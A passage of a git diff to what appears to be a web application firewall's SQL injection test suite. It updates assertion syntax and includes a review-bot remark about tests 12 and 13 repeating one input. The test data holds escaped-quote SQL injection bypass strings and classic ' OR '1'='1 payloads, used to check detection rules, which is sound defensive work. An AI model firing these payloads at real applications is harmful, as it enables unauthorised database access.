 version: HTTP/1.0
 output:
- no_log_contains: id "942521"
+ log:
+ no_expect_ids: [942521]
 - test_id: 13
 desc: "Negative test: bob's presentation's 'or'"
 stages:
@@ -211,7 +223,8 @@ tests:
 data: "var=''or"
 version: HTTP/1.0
 output:
- no_log_contains: id "942521"
+ log:
+ no_expect_ids: [942521]
 - test_id: 14
 desc: "Bypass with '''or 1"
 stages:
@@ -227,7 +240,8 @@ tests:
 data: "var='''or%201"
 version: HTTP/1.0
 output:
- log_contains: id "942521"
+ log:
+ expect_ids: [942521]
 - test_id: 15
 desc: "False-negative: Not detected with escapes"
 stages:
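Review bot: The negative assertion migrated in the `@@ -195,7 +206,8 @@` hunk (test 12) now reads `no_expect_ids: [942521]` against `data: "var=''or"`, which is the same body as test 11, even though test 12's desc names `'books' or 'applles'`; the `@@ -211,7 +223,8 @@` hunk (test 13, desc `bob's presentation's 'or'`) carries the identical `var=''or` body. Because the commit only swaps the assertion form, both tests keep re-checking the case test 11 already covers and never send the benign inputs their descriptions promise, so a regression on those phrases would go unnoticed. Setting each `data` to the URL-encoded phrase from its desc, in the way test 7 does with `var=mother%20or%20daughter`, would give the new `no_expect_ids` check something to prove. The surrounding `tests:` sequence begins outside these hunks.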
@@ -243,7 +257,8 @@ tests:
 data: "var=%5C'lol'%20or%20'1"
 version: HTTP/1.0
 output:
- no_log_contains: id "942521"
+ log:
+ no_expect_ids: [942521]
 - test_id: 16
 desc: "Negative test: Wikipedia article about SQLi"
 stages:
@@ -259,7 +274,8 @@ tests: data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20an
d%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" version: HTTP/1.0 output: - no_log_contains: id "942521" + log: + no_expect_ids: [942521] - test_id: 17 desc: "Performance test" stages: 
@@ -275,7 +291,8 @@ tests: data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60
%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40
%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%
27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%
60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 18 desc: "Performance test" stages: 
@@ -291,7 +308,8 @@ tests: data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.
'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 19 desc: "Negative test: performance test" stages: 
@@ -307,7 +325,8 @@ tests: data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'
.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" version: HTTP/1.0 output: - no_log_contains: id "942521" + log: + no_expect_ids: [942521] - test_id: 20 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: @@ -323,7 +342,8 @@ tests: data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 21 desc: "Detects odd number of quotes in request headers" stages: @@ -338,7 +358,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 22 desc: "Detects odd number of quotes in request headers" stages: @@ -353,7 +374,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 23 desc: "Detects odd number of quotes in request headers" stages: @@ -368,7 +390,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 24 desc: "Detects odd number of quotes in request headers" stages: @@ -383,4 +406,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml index 31a358005..f81b8e311 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml @@ -20,7 +20,8 @@ tests: data: "var=%5C'or'1" version: HTTP/1.0 output: - log_contains: id "942522" + log: + expect_ids: [942522] - test_id: 2 desc: "Blocks bypass with escaped quotes" stages: 
@@ -37,7 +38,8 @@ tests:
 data: "var=%5C%22or%221"
 version: HTTP/1.0
 output:
- log_contains: id "942522"
+ log:
+ expect_ids: [942522]
 - test_id: 3
 desc: "Blocks bypass with escaped quotes"
 stages:
@@ -54,7 +56,8 @@ tests:
 data: "var=%5C%60or%601"
 version: HTTP/1.0
 output:
- log_contains: id "942522"
+ log:
+ expect_ids: [942522]
 - test_id: 4
 desc: "Blocks bypass with: \\'and"
 stages:
@@ -70,7 +73,8 @@ tests:
 data: "var=%5C'and"
 version: HTTP/1.0
 output:
- log_contains: id "942522"
+ log:
+ expect_ids: [942522]
 - test_id: 5
 desc: "Negative test: doesn't block normal SQLi"
 stages:
@@ -86,7 +90,8 @@ tests:
 data: "var='or'1"
 version: HTTP/1.0
 output:
- no_log_contains: id "942522"
+ log:
+ no_expect_ids: [942522]
 - test_id: 6
 desc: "Negative test: doesn't block escaped quotes without following (and|or)"
 stages:
@@ -102,7 +107,8 @@ tests:
 data: "var=%5C' foo or"
 version: HTTP/1.0
 output:
- no_log_contains: id "942522"
+ log:
+ no_expect_ids: [942522]
 - test_id: 7
 desc: "New line bypass"
 stages:
@@ -118,7 +124,8 @@ tests:
 data: "var=newline%0A%5C' and 1"
 version: HTTP/1.0
 output:
- log_contains: id "942522"
+ log:
+ expect_ids: [942522]
 - test_id: 8
 desc: "Negative test: Wikipedia article about SQLi"
 stages:
@@ -134,7 +141,8 @@ tests: data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20inpu